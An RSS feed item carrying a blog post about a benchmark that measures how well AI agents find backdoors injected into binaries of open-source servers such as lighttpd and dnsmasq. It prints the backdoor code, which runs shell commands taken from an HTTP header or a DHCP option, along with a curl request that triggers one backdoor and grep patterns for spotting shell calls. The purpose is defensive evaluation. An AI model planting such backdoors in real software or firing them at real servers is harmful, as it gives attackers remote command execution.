<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Team Quesma</title>
    <description>The latest articles on DEV Community by Team Quesma (@teamquesma).</description>
    <link>https://dev.to/teamquesma</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3669005%2Fd0fb5411-2307-4264-9b21-7398290a46ac.png</url>
      <title>DEV Community: Team Quesma</title>
      <link>https://dev.to/teamquesma</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/teamquesma"/>
    <language>en</language>
    <item>
      <title>We hid backdoors in binaries — Opus 4.6 found 49% of them</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Thu, 19 Feb 2026 11:55:22 +0000</pubDate>
      <link>https://dev.to/teamquesma/we-hid-backdoors-in-binaries-opus-46-found-49-of-them-cpp</link>
      <guid>https://dev.to/teamquesma/we-hid-backdoors-in-binaries-opus-46-found-49-of-them-cpp</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://www.linkedin.com/in/piotr-grabowski-7a87522b3/" rel="noopener noreferrer"&gt;Piotr Grabowski&lt;/a&gt;, &lt;a href="https://www.linkedin.com/in/nablaone/" rel="noopener noreferrer"&gt;Rafał Strzaliński&lt;/a&gt;, &lt;a href="https://mkow.ch/" rel="noopener noreferrer"&gt;Michał Kowalczyk&lt;/a&gt;, &lt;a href="https://p.migdal.pl/" rel="noopener noreferrer"&gt;Piotr Migdał&lt;/a&gt;, and &lt;a href="https://www.linkedin.com/in/jacekmigdal/" rel="noopener noreferrer"&gt;Jacek Migdal&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Claude can code, but can it check binary executables?&lt;/p&gt;

&lt;p&gt;We already did our experiments with &lt;a href="https://quesma.com/blog/ghidra-mcp-unlimited-lives/" rel="noopener noreferrer"&gt;using NSA software to hack a classic Atari game&lt;/a&gt;. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, a reverse engineering expert from Dragon Sector known for &lt;a href="https://badcyber.com/dieselgate-but-for-trains-some-heavyweight-hardware-hacking/#main" rel="noopener noreferrer"&gt;finding malicious code in Polish trains&lt;/a&gt;, to create a benchmark for finding backdoors in binary executables without access to source code.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyz7pqk02nvfp1t8ib1by.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyz7pqk02nvfp1t8ib1by.webp" alt="BinaryAudit Model Rankings showing Claude Opus 4.6 leading at 49% pass rate" width="800" height="499"&gt;&lt;/a&gt;See &lt;a href="https://quesma.com/benchmarks/binaryaudit/" rel="noopener noreferrer"&gt;BinaryAudit&lt;/a&gt; for the full benchmark results — including false positive rates, tool proficiency, and the Pareto frontier of cost-effectiveness. All tasks are open source and available at &lt;a href="https://github.com/quesmaOrg/BinaryAudit" rel="noopener noreferrer"&gt;quesmaOrg/BinaryAudit&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;We were surprised that today’s AI agents can detect some hidden backdoors in binaries. We hadn’t expected them to possess such specialized reverse engineering capabilities.&lt;/p&gt;

&lt;p&gt;However, this approach is not ready for production. Even the best model, Claude Opus 4.6, found relatively obvious backdoors in small/mid-size binaries only 49% of the time. Worse yet, most models had a high false positive rate — flagging clean binaries.&lt;/p&gt;

&lt;p&gt;In this blog post, we discuss a few recent security stories, explain what binary analysis is, and how we construct a benchmark for AI agents. We will see when they accomplish tasks and when they fail — by missing malicious code or by reporting false findings.&lt;/p&gt;

&lt;h2&gt;
  
  
  Background
&lt;/h2&gt;

&lt;p&gt;Just a few months ago &lt;a href="https://entro.security/blog/shai-hulud-2-0-banks-gov-tech-breach/" rel="noopener noreferrer"&gt;Shai Hulud 2.0&lt;/a&gt; compromised thousands of organizations, including Fortune 500 companies, banks, governments, and cool startups — &lt;a href="https://posthog.com/blog/nov-24-shai-hulud-attack-post-mortem" rel="noopener noreferrer"&gt;see the postmortem by PostHog&lt;/a&gt;. It was a supply chain attack on the npm (Node Package Manager) ecosystem, injecting malicious code that stole credentials.&lt;/p&gt;

&lt;p&gt;Just a few days ago, &lt;a href="https://notepad-plus-plus.org/news/hijacked-incident-info-update/" rel="noopener noreferrer"&gt;Notepad++ shared updates on a hijack by state-sponsored actors&lt;/a&gt;, who replaced legitimate binaries with infected ones.&lt;/p&gt;

&lt;p&gt;Even the physical world is at stake, including critical infrastructure. For example, researchers found &lt;a href="https://www.reuters.com/sustainability/climate-energy/ghost-machine-rogue-communication-devices-found-chinese-inverters-2025-05-14/" rel="noopener noreferrer"&gt;hidden radios in Chinese solar power inverters&lt;/a&gt; and &lt;a href="https://www.theguardian.com/world/2025/nov/05/danish-authorities-in-rush-to-close-security-loophole-in-chinese-electric-buses" rel="noopener noreferrer"&gt;security loopholes in electric buses&lt;/a&gt;. Every digital device has firmware, which is much harder to check than the software we install on a computer — and has a much more direct impact. Both state and corporate actors have an incentive to tamper with it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxudvlkkgwrcvi9ug0mp.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxudvlkkgwrcvi9ug0mp.webp" alt="Michał 'Redford' Kowalczyk from Dragon Sector on Chaos Communication Congress on Breaking DRM in Polish trains." width="800" height="369"&gt;&lt;/a&gt;Michał “Redford” Kowalczyk from Dragon Sector on &lt;a href="https://media.ccc.de/v/37c3-12142-breaking_drm_in_polish_trains" rel="noopener noreferrer"&gt;reverse engineering a train to analyze a suspicious malfunction&lt;/a&gt;, the most popular talk at the &lt;a href="https://media.ccc.de/c/37c3" rel="noopener noreferrer"&gt;37th Chaos Communication Congress&lt;/a&gt;. See also &lt;a href="https://badcyber.com/dieselgate-but-for-trains-some-heavyweight-hardware-hacking/#main" rel="noopener noreferrer"&gt;Dieselgate, but for trains&lt;/a&gt; writeup and &lt;a href="https://news.ycombinator.com/item?id=42538914" rel="noopener noreferrer"&gt;a subsequent discussion&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;You do not even need bad actors. Network routers often have &lt;a href="https://arstechnica.com/information-technology/2021/01/hackers-are-exploiting-a-backdoor-built-into-zyxel-devices-are-you-patched/" rel="noopener noreferrer"&gt;hidden admin passwords baked into their firmware&lt;/a&gt; so the vendor can troubleshoot remotely — but anyone who discovers those passwords gets the same access.&lt;/p&gt;

&lt;p&gt;Can we use AI agents to protect against such attacks?&lt;/p&gt;




&lt;h2&gt;
  
  
  Binary analysis
&lt;/h2&gt;

&lt;p&gt;In day-to-day programming, we work with source code. It relies on high-level abstractions: classes, functions, types, organized into a clear file structure. LLMs excel here because they are trained on this human-readable logic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Malware analysis forces us into a harder world: binary executables.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Compilation translates high-level languages (like Go or Rust) into low-level machine code for a given CPU architecture (such as x86 or ARM). We get raw CPU instructions: moving data between registers, adding numbers, or jumping to memory addresses. The original code structure, together with variable and function names, gets lost.&lt;/p&gt;

&lt;p&gt;To make matters worse, compilers aggressively optimize for speed, not readability. They inline functions (changing the call hierarchy), unroll loops (replacing concise logic with repetitive blocks), and reorder instructions to keep the processor busy.&lt;/p&gt;

&lt;p&gt;Yet, a binary is what users actually run. And for closed-source and binary-distributed software, it is all we have.&lt;/p&gt;

&lt;p&gt;Analyzing binaries is a long and tedious process of reverse engineering, which starts with a chain of translations: &lt;strong&gt;machine code → assembly → pseudo-C&lt;/strong&gt;. Let’s see how an example backdoor looks in those representations:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Raw Binary&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;b9 01 00 00 00 48 89 df ba e0 00 00 00 e8 b6 c6 ff ff 49 89 c5 48 85 c0 74 6e 44 0f b6 40 01 4c 8d 8c 24 a0 01 00 00 49 8d 75 02 4c 89 cf 4c 89 c0 41 83 f8 08 72 0a 4c 89 c1 48 c1 e9 03 f3 48 a5 31 d2 41 f6 c0 04 74 09 8b 16 89 17 ba 04 00 00 00 41 f6 c0 02 74 0c 0f b7 0c 16 66 89 0c 17 48 83 c2 02 41 83 e0 01 74 07 0f b6 0c 16 88 0c 17 4c 89 cf c6 84 04 a0 01 00 00 00 e8 b7 4c fd ff
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2. Disassembly&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;33e88:  mov    ecx, 0x1
33e8d:  mov    rdi, rbx
33e90:  mov    edx, 0xe0
33e95:  call   30550
33e9a:  mov    r13, rax
33e9d:  test   rax, rax
33ea0:  je     33f10
33ea2:  movzx  r8d, BYTE PTR [rax+1]
33ea7:  lea    r9, [rsp+0x1a0]
33eaf:  lea    rsi, [r13+0x2]
        ... (omitted for brevity)
33efc:  mov    BYTE PTR [rsp+rax+0x1a0], 0x0
33f04:  call   system@plt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;3. Decompiled&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;lVar18 = FUN_00130550(pcVar41, param_4, 0xe0, 1);

if (lVar18 != 0) {
    bVar49 = *(byte *)(lVar18 + 1);
    puVar26 = (undefined8 *)(lVar18 + 2);
    pcVar20 = (char *)&amp;amp;local_148;

    if (7 &amp;lt; bVar49) {
        for (uVar44 = (ulong)(bVar49 &amp;gt;&amp;gt; 3); uVar44 != 0; uVar44--) {
            *(undefined8 *)pcVar20 = *puVar26;
            puVar26++; pcVar20 += 8;
        }
    }

    *(undefined1 *)((long)&amp;amp;local_148 + (ulong)bVar49) = 0;

    system((char *)&amp;amp;local_148);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Going from raw bytes to assembly is straightforward; it can be done with a command-line tool like &lt;a href="https://en.wikipedia.org/wiki/Objdump" rel="noopener noreferrer"&gt;objdump&lt;/a&gt;.&lt;/p&gt;
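&lt;p&gt;As a quick illustration, a single command produces a disassembly listing. &lt;code&gt;/bin/ls&lt;/code&gt; is used here only as a convenient stand-in binary; any ELF executable works:&lt;/p&gt;

```shell
# Disassemble a binary's machine code into assembly with objdump
# (part of binutils). /bin/ls is just a convenient example target.
objdump -d -M intel /bin/ls | head -n 25
```

&lt;p&gt;The output interleaves addresses, raw bytes, and mnemonics, much like the disassembly snippet shown above.&lt;/p&gt;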

&lt;p&gt;Turning assembly into C is much harder — we need reverse engineering tools, such as the open-source &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt; (created by the NSA) and &lt;a href="https://rada.re/" rel="noopener noreferrer"&gt;Radare2&lt;/a&gt;, or commercial ones like &lt;a href="https://hex-rays.com/ida-pro" rel="noopener noreferrer"&gt;IDA Pro&lt;/a&gt; and &lt;a href="https://binary.ninja/" rel="noopener noreferrer"&gt;Binary Ninja&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Decompilers try their best to make sense of the CPU instructions and generate readable C code. But since all those high-level abstractions and variable names got lost during compilation, the output is far from perfect. It is full of identifiers like &lt;code&gt;FUN_00130550&lt;/code&gt;, &lt;code&gt;bVar49&lt;/code&gt;, &lt;code&gt;local_148&lt;/code&gt; — names that mean nothing.&lt;/p&gt;




&lt;h2&gt;
  
  
  The benchmark
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Tasks
&lt;/h3&gt;

&lt;p&gt;We ask AI agents to analyze binaries and determine if they contain backdoors or malicious modifications.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhfdbj1fbd0lif6ei9dw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhfdbj1fbd0lif6ei9dw.png" alt=" " width="800" height="179"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We started with several open-source projects: &lt;a href="https://www.lighttpd.net/" rel="noopener noreferrer"&gt;lighttpd&lt;/a&gt; (a C web server), &lt;a href="https://dnsmasq.org/" rel="noopener noreferrer"&gt;dnsmasq&lt;/a&gt; (a C DNS/DHCP server), &lt;a href="https://github.com/mkj/dropbear" rel="noopener noreferrer"&gt;Dropbear&lt;/a&gt; (a C SSH server), and &lt;a href="https://github.com/sozu-proxy/sozu" rel="noopener noreferrer"&gt;Sozu&lt;/a&gt; (a Rust load balancer). Then, we manually injected backdoors. For example, we hid a mechanism for an attacker to execute commands via an undocumented HTTP header.&lt;/p&gt;

&lt;p&gt;Important caveat: All backdoors in this benchmark are artificially injected for testing. We do not claim these projects have real vulnerabilities; they are legitimate open-source software that we modified in controlled ways.&lt;/p&gt;

&lt;p&gt;These backdoors weren’t particularly sophisticated — we didn’t try to heavily obfuscate them or hide them in obscure parts of the code. They are the kind of anomaly a skilled human reverse engineer could spot relatively easily.&lt;/p&gt;

&lt;p&gt;The agents are given a compiled executable — without source code or debug symbols. They have access to reverse engineering tools: &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt;, &lt;a href="https://rada.re/" rel="noopener noreferrer"&gt;Radare2&lt;/a&gt;, and &lt;a href="https://www.gnu.org/software/binutils/" rel="noopener noreferrer"&gt;binutils&lt;/a&gt;. The task is to identify malicious code and pinpoint the start address of the function containing the backdoor (e.g., &lt;code&gt;0x4a1c30&lt;/code&gt;). See &lt;a href="https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/dnsmasq-backdoor-detect-printf/instruction.md" rel="noopener noreferrer"&gt;dnsmasq-backdoor-detect-printf/instruction.md&lt;/a&gt; for a typical instruction.&lt;/p&gt;

&lt;p&gt;A few tasks use a different methodology: we present three binaries and ask which ones contain backdoors, without asking for the specific location – see e.g. &lt;a href="https://github.com/QuesmaOrg/BinaryAudit/blob/main/tasks/sozu-backdoor-multiple-binaries-detect/instruction.md" rel="noopener noreferrer"&gt;sozu-backdoor-multiple-binaries-detect/instruction.md&lt;/a&gt;. We expected this to be a simpler task (it wasn’t). This approach simulates supply chain attacks, where often only a subset of the binaries is altered.&lt;/p&gt;

&lt;h3&gt;
  
  
  An example when it works
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Backdoor in an HTTP server
&lt;/h4&gt;

&lt;p&gt;We injected a backdoor into the lighttpd server that executes shell commands from an undocumented HTTP header.&lt;/p&gt;

&lt;p&gt;Here’s the core of the injected backdoor — it looks for a hidden &lt;code&gt;X-Forwarded-Debug&lt;/code&gt; header, executes its contents as a shell command via &lt;code&gt;popen()&lt;/code&gt;, and returns the output in a response header:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;gboolean li_check_debug_header(liConnection *con) {
    liRequest *req = &amp;amp;con-&amp;gt;mainvr-&amp;gt;request;
    GList *l;

    l = li_http_header_find_first(req-&amp;gt;headers, CONST_STR_LEN("X-Forwarded-Debug"));
    if (NULL != l) {
        liHttpHeader *hh = (liHttpHeader*) l-&amp;gt;data;
        char *debugIn = LI_HEADER_VALUE(hh);

        FILE *fp = popen(debugIn, "r");  // Execute attacker's command
        // ... read output into debugOut ...
        pclose(fp);

        li_http_header_insert(con-&amp;gt;mainvr-&amp;gt;response.headers,
            CONST_STR_LEN("X-Request-Trace"), debugOut, strlen(debugOut));
    }
    return TRUE;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To a user who downloaded this backdoored server, it would look like a legitimate program. However, an attacker could trivially execute any command by sending a specially crafted request.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Opus 4.5 found the backdoor within 5 minutes&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here’s how Claude did it:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1.&lt;/strong&gt; The model identified the binary and its 26 shared libraries — one of which contained the backdoor.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2.&lt;/strong&gt; Next, it ran &lt;code&gt;strings&lt;/code&gt; with grep patterns looking for obvious indicators of a backdoor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strings bin/lighttpd2-worker | grep -iE '(shell|bash|/bin/sh|exec|system|backdoor)'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;However, the command didn’t find anything suspicious. The model expanded the search to all shared libraries, looking for more patterns (hardcoded IPs, suspicious commands, and credential patterns). Still nothing obvious.&lt;/p&gt;
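&lt;p&gt;Such a sweep looks roughly like this (the patterns below are illustrative; they are not the agent’s exact regexes):&lt;/p&gt;

```shell
# Sweep every shared library for common backdoor indicators:
# hardcoded IPv4 addresses, shell paths, and credential-like strings.
# The patterns are illustrative, not the agent's exact ones.
for f in lib/*.so; do
  if strings "$f" | grep -qE '([0-9]{1,3}\.){3}[0-9]{1,3}|/bin/(sh|bash)|passw(or)?d|secret'; then
    echo "possible indicators in $f"
  fi
done
```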

&lt;p&gt;&lt;strong&gt;Step 3.&lt;/strong&gt; Claude switched strategies and used &lt;code&gt;nm -D&lt;/code&gt; to list imported functions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;for f in lib/*.so; do
  nm -D "$f" | grep -E ' U (system|exec|popen)'
done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This revealed something interesting:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Claude detected that one of the libraries the server uses imports &lt;code&gt;popen()&lt;/code&gt;, a function used to execute shell commands. This immediately alarmed the model:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.5:&lt;/strong&gt; The &lt;code&gt;liblighttpd2-shared.so&lt;/code&gt; uses &lt;code&gt;popen()&lt;/code&gt;. This could be legitimate (for spawning worker processes) or could be a backdoor. I need to investigate what these functions are used for by decompiling the code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 4.&lt;/strong&gt; Claude investigated further to determine if the function was truly malicious, using the Radare2 decompiler for analysis.&lt;/p&gt;

&lt;p&gt;It first identified which function calls &lt;code&gt;popen()&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 -q -c 'aaa; axt @ sym.imp.popen' lib/liblighttpd2-shared-2.0.0.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output of this command revealed that a function called &lt;code&gt;li_check_debug_header&lt;/code&gt; performs the shell execution (that’s the backdoor we added!). The model smelled something fishy:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.5:&lt;/strong&gt; This is very suspicious! A “debug header” function calling &lt;code&gt;popen&lt;/code&gt; is a classic backdoor pattern — it could be checking for a special HTTP header and executing commands based on it.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Then using Radare2’s decompiler, the model examined the function:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 -q -c 'aaa; s dbg.li_check_debug_header; pdc' lib/liblighttpd2-shared-2.0.0.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The decompiled pseudocode allowed the LLM to understand how the backdoor works — it looks for an undocumented HTTP header &lt;code&gt;X-Forwarded-Debug&lt;/code&gt; and if it’s present executes an attacker-provided command. The server conveniently sends the command output back in a &lt;code&gt;X-Request-Trace&lt;/code&gt; response header.&lt;/p&gt;
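&lt;p&gt;To make the data flow concrete, an attacker-side request would look something like this. This is a hypothetical sketch against a backdoored instance running locally on port 8080 (the port and the &lt;code&gt;id&lt;/code&gt; command are made up for illustration; only run this against your own test setup):&lt;/p&gt;

```shell
# Hypothetical trigger for the backdoor on a local test instance:
# the shell command travels in the X-Forwarded-Debug request header,
# and its output comes back in the X-Request-Trace response header.
curl -s -D - -o /dev/null \
  -H 'X-Forwarded-Debug: id' \
  http://127.0.0.1:8080/ | grep -i 'x-request-trace'
```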

&lt;p&gt;&lt;strong&gt;Step 5.&lt;/strong&gt; Finally, Claude used Radare2 to confirm the function wasn’t dead code, checking cross-references to ensure it was called from the main program:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;r2 -q -c 'aaa; s 0x00015260; pd 10' lib/liblighttpd2-shared-2.0.0.so
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now confident that it had found a real backdoor, Claude reported its findings and finished the exploration.&lt;/p&gt;

&lt;h3&gt;
  
  
  When it fails: rationalizing away an obvious backdoor
&lt;/h3&gt;

&lt;h4&gt;
  
  
  DHCP backdoor
&lt;/h4&gt;

&lt;p&gt;However, LLMs very often miss even obvious backdoors.&lt;/p&gt;

&lt;p&gt;We took dnsmasq — a widely used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via &lt;code&gt;execl("/bin/sh", "sh", "-c", buf, NULL)&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The backdoor we added was just 7 lines of C in DHCP packet parsing:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/* existing DHCP option handling */
match_vendor_opts(opt, daemon-&amp;gt;dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+   char buf[256];
+   int len = option_len(opt);
+   memcpy(buf, option_ptr(opt, 0), len);
+   buf[len] = '\0';
+   execl("/bin/sh", "sh", "-c", buf, NULL);
+ }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Claude Opus 4.6 found it… and persuaded itself there was nothing to worry about&lt;/strong&gt; &lt;br&gt;
Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found &lt;code&gt;/bin/sh&lt;/code&gt; in the strings output early on, traced it to the exact function containing the backdoor, and saw the &lt;code&gt;execl("/bin/sh", "sh", "-c", ...)&lt;/code&gt; call. Then it simply assumed it was normal:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.6:&lt;/strong&gt; I can see the &lt;code&gt;/bin/sh&lt;/code&gt; usage at &lt;code&gt;0x42e9df&lt;/code&gt; — it’s calling &lt;code&gt;execl("/bin/sh", "sh", "-c", r13, NULL)&lt;/code&gt;. This is a pattern for executing a shell command, which could be legitimate in dnsmasq (e.g., for DHCP script execution).&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;It examined the function, but concluded:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Claude Opus 4.6:&lt;/strong&gt; The &lt;code&gt;execl("/bin/sh", "sh", "-c", ...)&lt;/code&gt; pattern is typical of dnsmasq’s DHCP lease script execution. This is likely the legitimate lease_helper/script execution function.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The model found the exact function, saw the exact &lt;code&gt;execl&lt;/code&gt; call with &lt;code&gt;/bin/sh -c&lt;/code&gt; — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet from a client). It then moved on to investigate other functions and never circled back.&lt;/p&gt;

&lt;h3&gt;
  
  
  The needle-in-haystack problem
&lt;/h3&gt;

&lt;p&gt;The executables in our benchmark often have hundreds or thousands of functions — while the backdoors are tiny, often just a dozen lines buried deep within. Finding them requires strategic thinking: identifying critical paths like network parsers or user input handlers and ignoring the noise.&lt;/p&gt;

&lt;p&gt;Current LLMs lack this high-level intuition. Instead of prioritizing high-risk areas, they often decompile random functions or grep for obvious keywords like &lt;code&gt;system()&lt;/code&gt; or &lt;code&gt;exec()&lt;/code&gt;. When simple heuristics fail, models frequently hallucinate or give up entirely.&lt;/p&gt;

&lt;p&gt;This lack of focus leads them down rabbit holes. We observed agents fixating on legitimate libraries — treating them as suspicious anomalies. They wasted their entire context window auditing benign code while the actual backdoor remained untouched in a completely different part of the binary.&lt;/p&gt;




&lt;h2&gt;
  
  
  Limitations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  False positives
&lt;/h3&gt;

&lt;p&gt;The security community is drowning in AI-generated noise. The curl project recently &lt;a href="https://daniel.haxx.se/blog/2024/01/02/the-i-in-llm-stands-for-intelligence/" rel="noopener noreferrer"&gt;stopped paying for bug reports&lt;/a&gt; partly because of AI slop:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;The vast majority of AI-generated error reports submitted to cURL are pure nonsense.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;A security tool that gives you fake reports is useless and frustrating to use. We specifically tested for this with &lt;strong&gt;negative tasks&lt;/strong&gt; — clean binaries with no backdoor. We found that 28% of the time, models reported backdoors or issues that weren’t real. For any practical malware detection software, we would expect a false positive rate of less than 0.001%, as most software is safe (see the &lt;a href="https://en.wikipedia.org/wiki/Base_rate_fallacy" rel="noopener noreferrer"&gt;false positive paradox&lt;/a&gt;).&lt;/p&gt;
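&lt;p&gt;To see why the base rate matters, plug in some hypothetical numbers: suppose 1 in 10,000 audited binaries is actually backdoored, and apply the benchmark’s 49% detection rate and 28% false positive rate:&lt;/p&gt;

```shell
# Base-rate arithmetic. The 1-in-10,000 prevalence is a made-up
# illustration; the 49% detection and 28% false positive rates
# are from the benchmark.
awk 'BEGIN {
  prev = 0.0001; tpr = 0.49; fpr = 0.28
  alerts = tpr * prev + fpr * (1 - prev)
  printf "P(real backdoor given an alert) = %.4f\n", tpr * prev / alerts
}'
```

&lt;p&gt;With those hypothetical numbers, fewer than 1 in 5,000 alerts would point at a real backdoor; the rest would be noise.&lt;/p&gt;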

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90q2xhtlpv9hxw5qbj13.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F90q2xhtlpv9hxw5qbj13.webp" alt="Model ranking on false positive rate showing how often models incorrectly report backdoors in clean binaries" width="800" height="526"&gt;&lt;/a&gt;False positive rate measures how often models incorrectly report backdoors in clean binaries. Lower is better. See also &lt;a href="https://quesma.com/benchmarks/binaryaudit/#roc" rel="noopener noreferrer"&gt;detection vs false alarms&lt;/a&gt;, which combines it with the pass rate.&lt;/p&gt;

&lt;p&gt;For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Gemini 3 Pro:&lt;/strong&gt; I have confirmed that the &lt;code&gt;max-cache-ttl&lt;/code&gt; option (index 312, &lt;code&gt;0x138&lt;/code&gt;) is handled by code that treats its argument as a string and stores it at offset &lt;code&gt;0x138&lt;/code&gt; of the global configuration structure. This is highly suspicious for a TTL option which should be an integer.&lt;br&gt;
